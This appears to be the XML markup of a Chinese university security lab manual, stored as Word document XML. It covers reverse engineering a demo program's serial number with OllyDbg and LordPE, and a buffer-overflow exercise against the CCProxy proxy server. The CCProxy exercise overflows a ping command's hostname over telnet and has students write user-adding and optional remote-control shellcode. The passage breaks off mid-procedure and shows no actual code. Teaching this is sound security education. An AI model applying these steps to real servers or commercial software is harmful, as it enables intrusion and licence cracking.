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883" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验1 Win32漏洞攻防工具使用与实例分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握Win32进程的原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握PE格式文件以及载入原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握反汇编代码分析工具分析原理与使用方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需独立使用进程分析工具分析Win32进程空间信息；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以小组为单位完成反汇编分析以获得演示程序的序列号；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试与掌握函数反汇编执行流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统：Microsoft windows XP SP3</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者Win 7；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标软件：DemoD</w:t>
      </w:r>
      <w:r>
        <w:t>2020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.exe；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析工具：</w:t>
      </w:r>
      <w:r>
        <w:t>LordPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, OllyDbg，Visual C++ 6.0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="480" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk71707014"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：本实验可以在Win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面进行，请使用Win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面支持的OD或者X64</w:t>
      </w:r>
      <w:r>
        <w:t>Dbg</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:r>
        <w:t>LordPE.EXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通过该工具了解PE格式结构；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用Lo</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dPE与</w:t>
      </w:r>
      <w:r>
        <w:t>ProcessExplorer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，了解在win32进程空间的各个执行程序的分布；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>练习使用OllyDbg, 按照课堂讲解掌握该工具各个模块的功能；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用OllyDbg打开DemoD.exe,分析序列号；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析各类函数的调用方法，指出其调用区别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意事项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于进程分析，由于每个人的环境不同，进程的具体信息会有所不同，请在实验报告中指出个人实验主机的具体情况；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于序列号分析，由于每个人最终分析的序列号会有所不同，请注意找出区别，并在实验报告中指出难点与逆向关键代码；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试分析序列号的生成原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了上述三项以外，请根据实验内容在实验报告中指出自己的分析结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="883" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验2 Win32漏洞实例分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="883" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握反汇编代码分析工具分析原理与使用方法；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握缓冲区溢出的原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握缓冲区溢出漏洞的利用技巧；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理解缓冲区溢出漏洞的防范措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试与掌握函数反汇编执行流程；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到并定位溢出点；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成</w:t>
      </w:r>
      <w:r>
        <w:t>基本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:t>用户S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hellcode；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用缓冲区溢出执行Shell</w:t>
      </w:r>
      <w:r>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>一个具备远程连接控制功能的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>hellCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(可选)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统：Microsoft windows XP SP3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出软件：CCPROXY；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出工具：OllyDbg，Visual C++ 6.0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="480" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：本实验可以在Win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面进行，请使用Win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面支持的OD或者X64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dbg, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于Win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采取了多种保护措施，建议在X</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者Win7下面分析完成后，再通过Win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>操作步骤是以某windows OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>环境的参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:t>过程，注意，在不同的操作系统版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>，其具体代码地址会有所不同，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际</w:t>
      </w:r>
      <w:r>
        <w:t>测试结果定位相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令</w:t>
      </w:r>
      <w:r>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>寻找溢出点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CCPROXY是一款代理服务器软件，通过主机机向代理端发送命令，然后代理端向网络发送命令并且将结果返回给主机。本机与代理端的连接是通过TCP连接的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寻找溢出点的方法如下：首先用telent登陆CCPROXY：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5276850" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="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1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>：如果在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win7 或者</w:t>
      </w:r>
      <w:r>
        <w:t>Win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10,</w:t>
      </w:r>
      <w:r>
        <w:t>telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:t>可能不存在，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以重新</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>telnet客户端</w:t>
      </w:r>
      <w:r>
        <w:t>或者从网络下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:t>，比如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Putty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后通过发送ping命令，主机名用超长的字符串进行填充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5267325" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="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685800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
